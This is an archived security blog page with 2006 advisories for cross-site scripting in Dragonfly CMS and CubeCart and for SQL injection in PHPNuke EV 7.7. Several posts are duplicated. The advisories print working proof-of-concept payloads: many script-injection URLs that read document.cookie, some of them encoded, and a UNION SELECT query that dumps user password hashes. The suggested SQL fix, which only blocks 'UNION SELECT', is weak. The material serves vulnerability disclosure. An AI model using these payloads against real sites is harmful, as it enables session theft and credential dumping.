######################################################
Multiple Cross site scripting in dragonflycms 9.0.6.1
Vendor url:http://dragonflycms.org/
Advisore: http://lostmon.blogspot.com/2006/02/
multiple-cross-site-scripting-in.html
Vendor notify: exploit available: yes
OSVDB ID:23408,23409,23410,23411,23412,23413,23414,23415
Securitytracker:1015661
Secunia:18940
BID:16784
FrSIRT:ADV-2006-0688
######################################################
Description:
"Dragonfly CMS is a powerful, feature-rich, Open Source
content management system (CMS) based on PHP-Nuke 6.5.
We have spent over a year developing Dragonfly CMS,
paying close attention to security and reliability. The
release of Dragonfly marks yet another exciting milestone
in our history."
CPG Dragonfly is vulnerable to cross site scripting that
allow attackers to steal information from users by adding
JavaScript code via some of the parameters used by the CMS
product.
######################
Versions
######################
prior to Dragonfly 9.0.6.1
#########################
Solution
########################
No solution was available at this time.
##########################
Timeline
##########################
discovered:12-02-2006
vendor notify:20-02-2006 (web form "contact us")
vendor response:---------
disclosure:22-02-2006
#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh"><script>alert(document.cookie)
</script>
http://[Victim]/index.php?name=Your_Account&error=1
"><script>alert(document.cookie)</script>
&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3
"><script>alert(document.cookie)</script>
http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this "><script>alert(document.cookie)</script>
base64 cross site scripting , the XSS code are encoded in base64.
the username field are vulnerable too
insert in the box <script>alert()</script>
and this code is executed...
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script>
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://[Victim]/index.php?name=News&file=submit
// texareas 'Story Text' and Extended text are vulnerables.
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script>
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11"><script>alert()</script>
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005"><script>alert()</script>
>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all
"><script>alert()</script>
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert
(document.cookie)</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent"><script>alert()</script>
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled"><script>alert()</script>
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results
"><script>alert()</script>pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5
"><script>alert()</script>
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script>
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta=">
<script>alert()</script>
topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
"><script>alert()</script>
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
"><script>alert()</script>
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
if we insert in the search box this code "><script>alert()</script>
this is executed wen we click in Search button.
####################### €nd ############################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
Monday, January 23, 2006
########################################################
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################
1- includes/funcions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################
open includes/functions.inc.php look this code :
arround line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){
$text = preg_replace("/(\ Tuesday, January 10, 2006
MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################
1- includes/funcions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################
open includes/functions.inc.php look this code :
arround line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){
$text = preg_replace("/(\ Tuesday, January 10, 2006
################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################
I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:
http://www.bindshell.net/papers/xssv.html
CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.
###############
VERSIONS
###############
CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too
#################
Timeline
#################
Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006
###############
Examples:
###############
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go
http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>
#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>
#############
SOLUTION
#############
no solution was available at this time
currently i found a posible fix :
see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html
or
http://bugs.cubecart.com/?do=details&id=459
##################### €nd ########################
Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisore:http://lostmon.blogspot.com/2006/01/
cubecart-307-pl1-indexphp-multiple.html.
vendor notify:yes exploit avalable: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################
I recomended to all vendors to look this paper..
This is the new posible impact of XSS atacks:
http://www.bindshell.net/papers/xssv.html
CubeCart contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.
###############
VERSIONS
###############
CubeCart 3.0.7-pl1 vulnerable.
Other versions are posible vulnerables too
#################
Timeline
#################
Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006
###############
Examples:
###############
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go
http://[victim]cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewProd"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>
alert(document.cookie)</script>
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>
alert(document.cookie)</script>
#################
User field XSS
#################
Go to http://victim]/cc3/index.php?act=login
and inser in the username field this: "><script>
alert(document.cookie)</script>
#############
SOLUTION
#############
no solution was available at this time
currently i found a posible fix :
see
http://lostmon.blogspot.com/2006/01/
manual-fix-for-cross-site-scripting.html
or
http://bugs.cubecart.com/?do=details&id=459
##################### €nd ########################
Thnx to estrella to be my ligth
Thnx to all manglers of http://www.osvdb.org
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Monday, January 09, 2006
###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################
PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
posible prior versions are afected.
##################
solution:
###################
No solution at this time!!!
A posible fix:
Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
you can add this other :
------------------------------------
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2006/01/
phpnuke-ev-77-search-module-query.html
OSVDB ID:22316Related OSVDB:21002and:20866
BID:16186
Secunia:SA18394Related Secunia:SA17638 andSA17543
################################################
PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
posible prior versions are afected.
##################
solution:
###################
No solution at this time!!!
A posible fix:
Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
you can add this other :
------------------------------------
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code
for UNION ALL SELECT or other varians of xploit
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
►
2009
(25)
- ► November 2009 (1)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
►
2008
(24)
- ► August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
►
2007
(29)
- ► October 2007 (1)
- ► March 2007 (1)
-
►
2006
(14)
- ► August 2006 (1)
- ► February 2006 (1)
-
►
2005
(54)
- ► December 2005 (1)
- ► April 2005 (14)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...